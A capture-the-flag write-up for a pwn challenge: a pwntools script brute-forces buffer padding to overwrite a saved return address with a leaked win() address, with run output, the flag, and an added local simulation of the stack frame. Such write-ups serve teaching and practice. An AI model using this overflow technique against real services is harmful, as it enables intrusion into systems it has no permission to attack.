Warmup to the Dark Side

April 6, 2022

Solver: enscribe
Author: v10l3nt
Category: pwn
Points: 100
Remote: nc 0.cloud.chals.io 30096
Flag: shctf{I_will_remov3_th3s3_restraints_and_leave_the_c3ll}

Once you start down the dark path, forever will it dominate your destiny. (And yes, the binary isn’t included)

Let’s run that netcat link to see what’s going on:

$ nc 0.cloud.chals.io 30096
The Dark Side Of The Force, Are They. Easily They Flow, Quick To Join You In A Fight. The Dark Side resides at: 0x55a6b42f020c
Jedi Mind tricks dont work on me >>>

We’re given the address of the win() function… and that’s it. If this is a ret2win challenge, how are we meant to find the offset to the saved return address ($rip) so we can overwrite it with that address? Of course… we need to brute force it.

In the script below, I grab the address from the prompt by reading the line and slicing out the substring (ASLR is enabled, so it changes on every connection). Then I increase the padding in the payload one byte at a time in a loop until I hit the correct offset to $rip:

solve.py
#!/usr/bin/env python3
from pwn import *

# Try increasing amounts of padding until the win() address lands on the saved $rip.
for i in range(32, 128):
    p = remote("0.cloud.chals.io", 30096)
    # The banner is fixed-width up to the leak, so the 14-character address sits at [112:126].
    address = p.readlineS()[112:126]
    log.info("Trying offset " + str(i) + " for address " + address)
    # Padding followed by the leaked address, packed as a little-endian 64-bit pointer.
    p.sendline(b'A' * i + p64(int(address, base=16)))
    output = p.recvallS()
    if "shctf" in output:
        log.success(output)
        break
    p.close()

Let’s run this script against the server to see if we can get the flag:

[*] Trying offset 37 for address 0x55f788f1120c
[+] Receiving all data: Done (38B)
[*] Closed connection to 0.cloud.chals.io port 30096
[+] Opening connection to 0.cloud.chals.io on port 30096: Done
[*] Trying offset 38 for address 0x5631d523620c
[+] Receiving all data: Done (38B)
[*] Closed connection to 0.cloud.chals.io port 30096
[+] Opening connection to 0.cloud.chals.io on port 30096: Done
[*] Trying offset 39 for address 0x55980d2d520c
[+] Receiving all data: Done (38B)
[*] Closed connection to 0.cloud.chals.io port 30096
[+] Opening connection to 0.cloud.chals.io on port 30096: Done
[*] Trying offset 40 for address 0x55f0008b520c
[+] Receiving all data: Done (95B)
[*] Closed connection to 0.cloud.chals.io port 30096
[+] Jedi Mind tricks dont work on me >>>
shctf{I_will_remov3_th3s3_restraints_and_leave_the_c3ll}
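Why the loop stops at exactly 40: the simulation below is an added example (my own, not the author’s solve.py) that models the frame as a 32-byte buffer plus the 8-byte saved rbp in front of the return address; that layout, the FakeService class and the random win() values are assumptions, since the binary is not included. It also parses the leak by pattern instead of by fixed column, and it models no stack canary, which is the only reason a blind padding sweep like this can succeed.

```python
import re
import secrets

# Constructed frame layout (an assumption: the challenge binary is not included).
# A 32-byte buffer plus the 8-byte saved rbp puts the return address at offset 40.
BUFFER_SIZE = 32
SAVED_RBP = 8
RET_OFFSET = BUFFER_SIZE + SAVED_RBP

ADDR_RE = re.compile(r"resides at: (0x[0-9a-fA-F]+)")


def parse_win_address(banner: str) -> int:
    """Pull the leaked win() address out of the banner by pattern instead of
    by fixed column, so a changed banner cannot silently shift the slice."""
    match = ADDR_RE.search(banner)
    if match is None:
        raise ValueError("no address leaked in banner")
    return int(match.group(1), 16)


class FakeService:
    """One simulated connection. PIE/ASLR gives a fresh win() address each time;
    no stack canary is modelled, which is why the padding sweep can succeed."""

    def __init__(self):
        # Constructed: random page base, low 12 bits fixed like the real leaks (...20c).
        self.win = (secrets.randbits(28) << 12) | 0x20C
        self.banner = f"The Dark Side resides at: {self.win:#x}\n"

    def send(self, payload: bytes) -> str:
        # Only the 8 bytes that land exactly on the saved return address matter;
        # shorter or misaligned overwrites leave a garbage pointer, not win().
        ret = payload[RET_OFFSET:RET_OFFSET + 8]
        if len(ret) == 8 and int.from_bytes(ret, "little") == self.win:
            return "Jedi Mind tricks dont work on me >>>\nshctf{simulated_flag}\n"
        return "Jedi Mind tricks dont work on me >>>\n"


def find_offset(make_service, low=32, high=128):
    """The writeup's loop run against the simulator: returns the padding length
    at which the packed address overwrites the return address, or None."""
    for i in range(low, high):
        svc = make_service()
        payload = b"A" * i + parse_win_address(svc.banner).to_bytes(8, "little")
        if "shctf" in svc.send(payload):
            return i
    return None
```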